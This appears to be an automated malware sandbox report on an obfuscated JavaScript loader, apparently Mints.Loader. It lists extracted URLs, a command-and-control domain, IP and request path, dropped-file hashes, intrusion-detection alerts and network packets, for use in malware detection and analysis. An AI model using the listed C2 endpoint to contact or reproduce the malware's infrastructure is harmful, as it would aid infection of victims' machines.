                  https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000001.00000002.1958536023.0000020E93C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000001.00000002.1942671396.0000020E8489A000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.google.com/preferences?hl=enXpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83CEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/?tab=wopowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://news.google.com/?tab=wnpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://mail.google.com/mail/?tab=wmpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/logos/doodles/2024/seasonal-holidays-202powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1942671396.0000020E851CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schema.org/WebPagepowershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E848A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84ADE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8487F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8488C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84886000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E848B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E8489A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.youtube.com/?tab=w1powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://mbuzy3yvzw3r.toppowershell.exe, 00000001.00000002.1942671396.0000020E84F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84C85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83B82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.com/webhp?tab=wwpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.google.com/history/optout?hl=enpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://books.google.com/?hl=en&tab=wppowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E85314000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.google.com/finance?tab=wepowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://oneget.orgXpowershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.google.compowershell.exe, 00000001.00000002.1942671396.0000020E84F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83CEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1942671396.0000020E83961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://apis.google.compowershell.exe, 00000001.00000002.1958536023.0000020E93C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E939D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D1D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E83D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1958536023.0000020E93970000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1942671396.0000020E83961000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000001.00000002.1942671396.0000020E83EB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://oneget.orgpowershell.exe, 00000001.00000002.1942671396.0000020E84F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000001.00000002.1942671396.0000020E84F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1942671396.0000020E843E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    172.217.19.228
                                                                                                    www.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    45.61.137.71
                                                                                                    mbuzy3yvzw3r.topUnited States
                                                                                                    40676AS40676USfalse
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1576929
                                                                                                    Start date and time:2024-12-17 18:21:06 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 3m 30s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:6
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • GSI enabled (Javascript)
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:7hCWDvuinz.js
                                                                                                    renamed because original name is a hash value
                                                                                                    Original Sample Name:2500f98e30ed3f862562b0009d9a86dbeba9a6a98decbd4d0ca464fb2d7fed2f.js
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.expl.evad.winJS@4/5@2/2
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 4
                                                                                                    • Number of non-executed functions: 0
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .js
                                                                                                    • Stop behavior analysis, all processes terminated
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5348 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: 7hCWDvuinz.js
                                                                                                    TimeTypeDescription
                                                                                                    12:22:14API Interceptor46x Sleep call for process: powershell.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    45.61.137.71Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    Fattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                    • mbuzy3yvzw3r.top/1.php?s=mints13
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    mbuzy3yvzw3r.topFattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    AS40676USFattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura72543461.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura60963242.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    M3rzaYgoAd.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    g12Hh44xD1.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    Fattura02609628.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    epYccIe7yg.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 45.61.137.71
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:@...e.................................X..............@..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6221
                                                                                                    Entropy (8bit):3.744284597195811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:b0F33CxHDdkvhkvCCtDNLyl8QHQNLyl8THr:b0FyjJDNLCANLCS
                                                                                                    MD5:8931636D8766958E934CD3759B13A0FA
                                                                                                    SHA1:F01E4320D3608E0ED11D1F51B7C1D4579046149F
                                                                                                    SHA-256:7A7FF5E7A1E2AFCFE647D4F0D5DC89C292ECA2E1796B063AE479C2E57031F7FB
                                                                                                    SHA-512:E7C6F58A6604BE118101CD5E8A2E3BF22C1CE4299D6DFD726626D27CAF21CAEA7D7B1B30B27EB4A5157E76EAD4E0A61ED2FB7637689F3CF0BA84F3795592161D
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ...-/.v...../5.P..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v...../>*.P....=5.P......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y.............................q..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.....Q...........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6221
                                                                                                    Entropy (8bit):3.744284597195811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:b0F33CxHDdkvhkvCCtDNLyl8QHQNLyl8THr:b0FyjJDNLCANLCS
                                                                                                    MD5:8931636D8766958E934CD3759B13A0FA
                                                                                                    SHA1:F01E4320D3608E0ED11D1F51B7C1D4579046149F
                                                                                                    SHA-256:7A7FF5E7A1E2AFCFE647D4F0D5DC89C292ECA2E1796B063AE479C2E57031F7FB
                                                                                                    SHA-512:E7C6F58A6604BE118101CD5E8A2E3BF22C1CE4299D6DFD726626D27CAF21CAEA7D7B1B30B27EB4A5157E76EAD4E0A61ED2FB7637689F3CF0BA84F3795592161D
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. ...-/.v...../5.P..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v...../>*.P....=5.P......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......CW.^.Y.............................q..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Y............................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.....Q...........
                                                                                                    File type:ASCII text, with very long lines (616), with CRLF line terminators
                                                                                                    Entropy (8bit):4.521438913164892
                                                                                                    TrID:
                                                                                                      File name:7hCWDvuinz.js
                                                                                                      File size:109'262 bytes
                                                                                                      MD5:7edb0e1b622e9cf94985f71d13c71eb9
                                                                                                      SHA1:efafc43b055530f6ed2cfdc69c805be6aa52be01
                                                                                                      SHA256:2500f98e30ed3f862562b0009d9a86dbeba9a6a98decbd4d0ca464fb2d7fed2f
                                                                                                      SHA512:3fb79b6274f48c368109062108cc0dcf5e740839d786142abbc84e9086ea3b7ea6b4cfdfda04116c2089f547a978cbc53585efaf72435fcab559d295cfdc579a
                                                                                                      SSDEEP:384:iawuMawVCSawehc1XhQcI3f+ITaRBZiTawvLbawYzawGTaReTaReTaRrxEawMTax:9+577Sy7n77E77FRFy7sP77n7VFECj
                                                                                                      TLSH:C5B3B834ED8501AB2ED95945AD6201EB85F9D34E831621E0F8ADA3CC1A8393C57F3B7C
                                                                                                      File Content Preview:WScript.Sleep(11000);..// voes upbuilder snappier reattributes dahs ogrish resized sunstruck oolite cantilevering teardrops acronic lockstep oh gracious grok deposition oscitances advocative naboberies humorist questionary pilchard contumaciously circuite
                                                                                                      Icon Hash:68d69b8bb6aa9a86
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-17T18:22:17.543810+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.44973145.61.137.7180TCP
                                                                                                      2024-12-17T18:22:17.543810+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.44973145.61.137.7180TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 17, 2024 18:22:15.798366070 CET4973180192.168.2.445.61.137.71
                                                                                                      Dec 17, 2024 18:22:15.918075085 CET804973145.61.137.71192.168.2.4
                                                                                                      Dec 17, 2024 18:22:15.918154955 CET4973180192.168.2.445.61.137.71
                                                                                                      Dec 17, 2024 18:22:15.971632957 CET4973180192.168.2.445.61.137.71
                                                                                                      Dec 17, 2024 18:22:16.091152906 CET804973145.61.137.71192.168.2.4
                                                                                                      Dec 17, 2024 18:22:17.492166042 CET804973145.61.137.71192.168.2.4
                                                                                                      Dec 17, 2024 18:22:17.543809891 CET4973180192.168.2.445.61.137.71
                                                                                                      Dec 17, 2024 18:22:17.632426023 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:17.752744913 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:17.752855062 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:17.753047943 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:17.875019073 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546190023 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546303988 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546372890 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.546478033 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546494961 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546542883 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.546912909 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546928883 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546945095 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.546998024 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.547524929 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.547539949 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.547555923 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.547584057 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.547621965 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.667689085 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.667706013 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.667807102 CET4973380192.168.2.4172.217.19.228
                                                                                                      Dec 17, 2024 18:22:19.733164072 CET8049733172.217.19.228192.168.2.4
                                                                                                      Dec 17, 2024 18:22:19.738780975 CET8049733172.217.19.228192.168.2.4
